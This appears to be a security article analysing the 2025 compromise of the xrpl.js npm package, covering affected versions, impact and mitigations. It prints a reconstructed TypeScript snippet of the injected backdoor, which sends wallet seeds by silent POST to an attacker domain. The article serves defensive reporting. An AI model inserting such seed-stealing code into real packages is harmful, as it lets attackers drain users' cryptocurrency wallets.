
The widely used xrpl.js library, a critical component for interacting with the XRP Ledger, was compromised in a supply chain attack that injected malicious code to steal users’ private keys and wallet seeds. The attack, discovered in April 2025, affected versions 2.14.2 and 4.2.1–4.2.4 of the npm package, which averages over 140,000 weekly downloads. Threat actors hijacked the npm account of a Ripple employee to publish backdoored updates, marking one of the most significant crypto-focused supply chain attacks of the year [1].
Attack Mechanism and Technical Analysis
The attackers inserted a malicious function named checkValidityOfSeed into the library’s src/index.ts file. This function intercepted wallet operations such as Wallet.fromSeed and Wallet.generate, exfiltrating sensitive data to a remote server (https://0x9c[.]xyz/xcm) via HTTP POST requests. The payload was obfuscated to resemble analytics traffic, delaying detection [2].
The injected code snippet below demonstrates the exfiltration logic:
```typescript
// Injected into src/index.ts of the backdoored npm releases; absent from the GitHub repository.
function checkValidityOfSeed(seed: string): boolean {
  // Exfiltration endpoint (written defanged here), disguised as analytics traffic.
  const exfilUrl = "https://0x9c[.]xyz/xcm";
  // The seed passed to Wallet.fromSeed / Wallet.generate is sent out in a fire-and-forget POST.
  fetch(exfilUrl, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ seed, userAgent: navigator.userAgent })
  }).catch(() => {}); // errors are swallowed so the caller never observes a failure
  // Always reports the seed as valid, so the wrapped wallet operation proceeds normally.
  return true;
}
```
Notably, the malicious code was absent from the library’s GitHub repository, confirming a targeted npm compromise rather than a source code breach [3].
Impact and Mitigation
The attack exposed approximately 135,000 weekly users and 2.9 million total downloads. While only 452 downloads of the malicious packages were logged, indirect dependencies likely expanded the impact. The XRP Ledger Foundation released patched versions (4.2.5 and 2.14.3) within 48 hours and advised users to:
- Immediately upgrade to the latest version
- Rotate keys for wallets that used affected versions
- Disable master keys if exposed [4]
Security researchers identified parallels with recent attacks on Solana’s web3.js and Ethereum’s ethers.js, suggesting a broader campaign targeting crypto libraries [5].
Broader Implications for Supply Chain Security
This incident highlights systemic risks in open-source ecosystems, where 60% of npm packages rely on indirect dependencies. The attackers leveraged credential phishing rather than code vulnerabilities, bypassing traditional vulnerability scanners. Similar tactics were observed in recent npm and PyPI campaigns targeting Solana and PayPal users [6].
Key recommendations for mitigating such threats include:
- Enforcing multi-factor authentication (MFA) for npm/GitHub accounts
- Implementing dependency auditing tools like npm audit or Socket.dev
- Establishing zero-trust CI/CD pipelines with checksum verification
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added npm-related flaws to its Known Exploited Vulnerabilities Catalog, reflecting growing regulatory attention to supply chain risks [7].
Conclusion
The xrpl.js compromise underscores the convergence of software supply chain threats and financial cybercrime. As attackers increasingly target crypto infrastructure, proactive measures like automated secret scanning and threat intelligence sharing become essential. Organizations using XRP Ledger integrations should audit their dependency trees and monitor for anomalous wallet activity.
References
[1] “xrpl.js npm Package Compromised in Supply Chain Attack,” Aikido Security, 2025.
[2] “Ripple’s xrpl.js Library Backdoored to Steal Wallets,” Security Affairs, 2025.
[3] “GitHub vs. npm Discrepancy in xrpl.js Attack,” OneSafe, 2025.
[4] “XRPL Guide: Disabling Master Keys,” XRP Ledger Foundation, 2025.
[5] “Solana web3.js Library Backdoor Incident,” BleepingComputer, 2025.
[6] “Malicious npm Packages Target PayPal Users,” Security Affairs, 2025.
[7] “CISA Known Exploited Vulnerabilities Catalog,” U.S. Cybersecurity and Infrastructure Security Agency, 2025.